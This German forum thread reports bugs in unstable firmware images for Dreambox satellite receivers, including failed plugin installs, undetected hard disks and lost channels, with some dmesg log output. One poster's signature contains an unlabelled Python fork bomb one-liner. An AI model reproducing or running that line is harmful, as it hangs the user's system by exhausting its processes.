Sammelthrad für unstable images DM8000/DM800/DM500HD

• ein paar sachen kann ich dir so sagen

1. das removen des genuine ist nur noch per console und mit einigen zusaetzen moeglich
    2. plugins removen ueber erweiterungen ist schon seit 2.8.3 nicht moeglich, kein bug sondern feature von dmm *hust*
    3. zu 4. wie meinst du das ?
  • Original von lion70

2. Bug - über Erweiterungen vom Menü .. wollte ich Genuine Dreambox löschen mit roter taste --->> No new plugins found ist die antwort !!!

3. Bug - über Erweiterungen vom Menü ... Plugins herunterladen --->>> No new plugins found ist die antwort !!!

Gruß

klingt für mich,als ob du keine inet verbindung hast
    zumindest kommt das bei mir wenn ich keine hab,
    schau mal nach
  • Na ganz einfach
    wenn die gesichterten Configs eingespielt werden , danach einen kompletten neustart machen und alles geht wie vorher ..
    War aber schon immer so ...
    ------------------------------------------------
    DM800SE HD + 120GB OCZ SSD & E2
    SKY Full & MTV und noch einiges mehr
    Inverto Multifeed 9-13-19-23-28
  • Hi mactep

I-Net verbindung hab ich - weil ich konnte über Newnigma-Service - Online Installation das Addon auswählen -- z.b. Mytube und installieren über das Menü - Plugins herunterladen gings leider nicht.

Nerventod2
    starte die box immer komplett neu - wenn ich meine Einstellungen eingespielt hab !

aber ich werds heute abend nochmal probieren

Wie ich geschrieben habe - ich flashe jedes neue Image - und mach das nicht über update - vielleicht sehe ich so bugs die mit der updatemethode nicht auftauchen ??!!

Gruß
  • Original von lion70
    Hi mactep

I-Net verbindung hab ich - weil ich konnte über Newnigma-Service - Online Installation das Addon auswählen -- z.b. Mytube und installieren über das Menü - Plugins herunterladen gings leider nicht.

Nerventod2
    starte die box immer komplett neu - wenn ich meine Einstellungen eingespielt hab !

aber ich werds heute abend nochmal probieren

Wie ich geschrieben habe - ich flashe jedes neue Image - und mach das nicht über update - vielleicht sehe ich so bugs die mit der updatemethode nicht auftauchen ??!!

Gruß

ein paar sachen kann ich dir so sagen

1. das removen des genuine ist nur noch per console und mit einigen zusaetzen moeglich
    2. plugins removen ueber erweiterungen ist schon seit 2.8.3 nicht moeglich, kein bug sondern feature von dmm *hust*
    3. zu 4. wie meinst du das ?
  • ok

3. Bug - über Erweiterungen vom Menü ... Plugins herunterladen --->>> No new plugins found ist die antwort !!!

4. Bug - Newnigmaservice - Softwareverwaltung - Online Installation - wenn man da was installiert hat - wird die interne Festplatte nicht mehr erkannt.

Das waren die Bugs - genau erklärt

Ich wollte über Menü - Erweiterungen - mit der grünen Taste in Erweiterungen mytube installieren - Antwort auf drücken des grünen Knopfes - No new plugins found
    INet verbindung war aber aktiv da ich dann über
    Newnigmaservce (blaue Taste) - Softwareverwaltung - Online Installation das Mytube auswählen konnte und dann auch installieren konnte.

zu. 4. als ich das Installiert hatte war der Festplattenzugriff weg - mußte reboot machen damit alles wieder lief

Hoff ich habs gut genug beschrieben.
    Danke für die schnellen Infos
  • ne falsch verstanden

4. Bug - Newnigmaservice - Softwareverwaltung - Online Installation - wenn man da was installiert hat - wird die interne Festplatte nicht mehr erkannt.

war das von dir, das versteh ich nicht ..

das mit der onlineinstallation ist von dmm teilweise deaktiviert .. aber mal schauen ..
  • Dann haben wir ja 3 von 4 schon geklärt ;)

Also ich habe über newnigmaservice - Softwareverwaltung - Online Installation
    das Mytube addon installiert
    Installation war fertig ohne Fehler
    Als ich dann auf meine Aufnahmen zugreiffen wollte auf der Festplatte - unmittelbar nach der Installation von mytube - war diese weg.

Nach dem Reeboot ging alles wieder ganz normal und konnte auf meine daten der Festplatte zugreifen - und auch über mytube was speichern.

Werde heute abend aber nochmal versuchen den Fehler zu rekonstruieren - vielleicht war es ein einmaliger hänger.

Gruß

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von lion70 ()

• Und am besten dann auch einmal mitloggen und evtl. sogar noch nen bootlog machen.

Dies dann hier mal anhängen...

mfg,
    KLPsAUGER
    Dreambox 8000sscc, Dreambox 800se, NAS 1 (Buffalo 1TB LinkStation), NAS 2 (Buffalo 1TB LinkStation mit FTP Server), NAS 3 (Synology Ds2009+ mit 2TB Platten im Raid 0 - Verbund) 14 Smargo, Ubuntu - Server / CCcam & 2 aktiven 7 - Port USB Hub's, DLan (develo 200AVplus), DLink (DES-1005D), TP-Link (TL-SG1005D), 3Com (4228G), hama (Hub & Cardreader), CF - Karte (2x a 2GB), SD - Karte (2GB), Router (Fritz!Box 7390), externer DVD-Brenner (LG GE20LU, USB 2.0, schwarz), Teufel Concept E 400 - digital (Musikanlage)

• hallo habe eine frage an das unstable mit dem neuen kernel habe zur zeit das newnigma 2.8.3 drauf würded ihr mier das unstable empfehlen?
    habe eine dm 800 und wenn jedentag neue unstable kommt so das mann jedesmahl flashen soll oder einfach update machen im newnigma service machen?

mfg
    sülli
  • Hi

Hab gestern das Unstable vom 11.03. in den Flash meiner DM 8000 gepackt.
    Leider wird keine Festplatte erkannt.Ist eine eingebaute Samsung mit einem Terrabyte Speicher.
  • Original von dreamedge
    Original von nixkoenner
    Original von dreamedge
    Originally posted by nixkoenner
    dann liefer dochmal neen bootlog :glaskugel2:

da is er 8)

welche platte marke model ?

Western Digital My Book 1TB esata/usb/fw

noch mal nach vorne holen

schau doch nochmal mit dem unstable von morgen :D
    » time to say goodbye «

Konfuzius sagt:
    Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
  • Original von Gerald Z
    Erst seit heutigen Unstable wird meine „Kingston SSDNow 40 GB“ nicht mehr erkannt.
    Lief bis heute ohne Probleme.

Habe 2 Platten drin.

„WDC WD10EADS-00L“ wird weiterhin ohne Probleme erkannt.

Haste evtl nen bootlog weil wir da am kernel mom rumbasteln.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Originally posted by nixkoenner

schau doch nochmal mit dem unstable von morgen :D

habe gerade mal das von heute 6:45 geflashed .....

aber bin wieder zurueck auf das vom 13-03 ...

hatte keine Sat mehr...

habe Hotbird und astra ... aber ueberall was SER 0 ...

und suche hat auch nur 1300 sender geliefert (sonst 2900)

Die platte wurde auch nicht erkannt ....

Musste aber wegen allem sport heut wieder eine laufende Box haben .. deswegen ist heute Teststop .....

EDIT : Habe auf 13-03 ein online update gemacht ....

dmesg gibt das aus

ATA: abnormal status 0xD0 on port 0xb051001c
    ATA: abnormal status 0xD0 on port 0xb051001c
    ata1.00: qc timeout (cmd 0xec)
    ata1.00: failed to IDENTIFY (I/O error, err_mask=0x4)
    ata1: classification failed
    ata1: reset failed, giving up
    scsi1 : sata_svw
    ata2: SATA link down (SStatus 0 SControl 0)
    Why drink & Drive ?

When you can smoke & fly 8)

Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von dreamedge ()

• Hallo,

habe seit dem Update auf das Unstable Image mit dem neuen Kernel Aussetzer beim Abspielen von Filmen von meiner internen HD. Temp. der Festplatte ist dabei ca. 50°. Hatte vorher noch keine Probleme. Kann das am neuen Image liegen??